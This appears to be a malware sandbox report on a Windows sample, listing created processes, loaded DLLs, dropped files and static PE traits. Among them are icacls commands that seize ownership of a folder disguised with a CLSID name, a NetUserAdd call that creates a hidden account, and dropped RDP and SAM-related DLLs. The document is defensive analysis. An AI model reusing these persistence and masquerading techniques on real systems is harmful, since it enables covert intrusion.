Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

File written: C:\Users\user\AppData\Local\Temp\wfpblk.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 11950592 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x8b1200
Source: file.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x100200

Source:	Binary string: RfxVmt.pdb source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.1974223599.000001FC7A526000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.23.dr, HwfABz7s.23.dr
Source:	Binary string: RfxVmt.pdbGCTL source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.1974223599.000001FC7A526000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.23.dr, HwfABz7s.23.dr

Source: rfxvmt.dll.23.dr

Static PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

Code function: 5_2_00007FF73AFBFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

5_2_00007FF73AFBFF1F

Source: file.exe	Static PE information: section name: .didata
Source: 3lp16vmh8u8y3z1y6.exe.1.dr	Static PE information: section name: .xdata
Source: dx4w727xyq6q2yaxja.exe.1.dr	Static PE information: section name: .xdata
Source: main.exe.12.dr	Static PE information: section name: .xdata
Source: cnccli.dll.23.dr	Static PE information: section name: .xdata
Source: libi2p.dll.23.dr	Static PE information: section name: .xdata
Source: evtsrv.dll.23.dr	Static PE information: section name: .xdata
Source: termsrv32.dll.23.dr	Static PE information: section name: .xdata
Source: rdpctl.dll.23.dr	Static PE information: section name: .xdata
Source: samctl.dll.23.dr	Static PE information: section name: .xdata
Source: prgmgr.dll.23.dr	Static PE information: section name: .xdata
Source: dwlmgr.dll.23.dr	Static PE information: section name: .xdata
Source: zFE1sfMY.23.dr	Static PE information: section name: .xdata
Source: zCUeqzwC.23.dr	Static PE information: section name: .xdata
Source: j8fz8FfX.23.dr	Static PE information: section name: .xdata
Source: kInii6kX.23.dr	Static PE information: section name: .xdata
Source: Jcf8nu5c.23.dr	Static PE information: section name: .xdata
Source: 9qaNW6z6.23.dr	Static PE information: section name: .xdata
Source: TLN3Eh0f.23.dr	Static PE information: section name: .xdata
Source: DYoNFfUY.23.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02FAF262 push es; retf	0_2_02FAF263
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02F9124F push ecx; retf	0_2_02F91252
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02F96761 push esi; ret	0_2_02F96763
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E17726F push qword ptr [rsi]; ret	23_2_00007FFE0E177275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E17727C push rsp; ret	23_2_00007FFE0E17727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772BC push rsp; ret	23_2_00007FFE0E1772BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772B8 push rsp; ret	23_2_00007FFE0E1772B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772E4 push rsp; ret	23_2_00007FFE0E1772E5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772E0 push rsp; ret	23_2_00007FFE0E1772E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772E8 push rsp; ret	23_2_00007FFE0E1772E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772C4 push rsp; ret	23_2_00007FFE0E1772C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772CC push rsp; ret	23_2_00007FFE0E1772CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772D4 push rsp; ret	23_2_00007FFE0E1772D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772D0 push rsp; ret	23_2_00007FFE0E1772D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772DC push rsp; ret	23_2_00007FFE0E1772DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1772D8 push rsp; ret	23_2_00007FFE0E1772D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1779B3 push qword ptr [00007FFE44177884h]; retf	23_2_00007FFE0E1779B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1779BB push qword ptr [00007FFE4417788Ch]; retf	23_2_00007FFE0E1779C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1779E7 push qword ptr [00007FFE441778B8h]; retf	23_2_00007FFE0E1779ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1779EF push qword ptr [00007FFE441778C0h]; retf	23_2_00007FFE0E1779F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1779F7 push qword ptr [00007FFE441778C8h]; retf	23_2_00007FFE0E1779FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1779C3 push qword ptr [00007FFE44177894h]; retf	23_2_00007FFE0E1779C9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1779CB push qword ptr [00007FFE4417789Ch]; retf	23_2_00007FFE0E1779D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1779D3 push qword ptr [00007FFE441778A4h]; retf	23_2_00007FFE0E1779D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E1779FF push qword ptr [00007FFE441778D0h]; retf	23_2_00007FFE0E177A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E177A07 push qword ptr [00007FFE441778D8h]; retf	23_2_00007FFE0E177A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E177A0F push qword ptr [00007FFE441778E0h]; retf	23_2_00007FFE0E177A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0E177A17 push qword ptr [00007FFE151778E8h]; retf	23_2_00007FFE0E177A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE0EB50052 push rsi; iretd	23_2_00007FFE0EB50053

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FFE0E13870B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,

23_2_00007FFE0E13870B

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\kInii6kX	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\9qaNW6z6	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\j8fz8FfX	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Jcf8nu5c	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
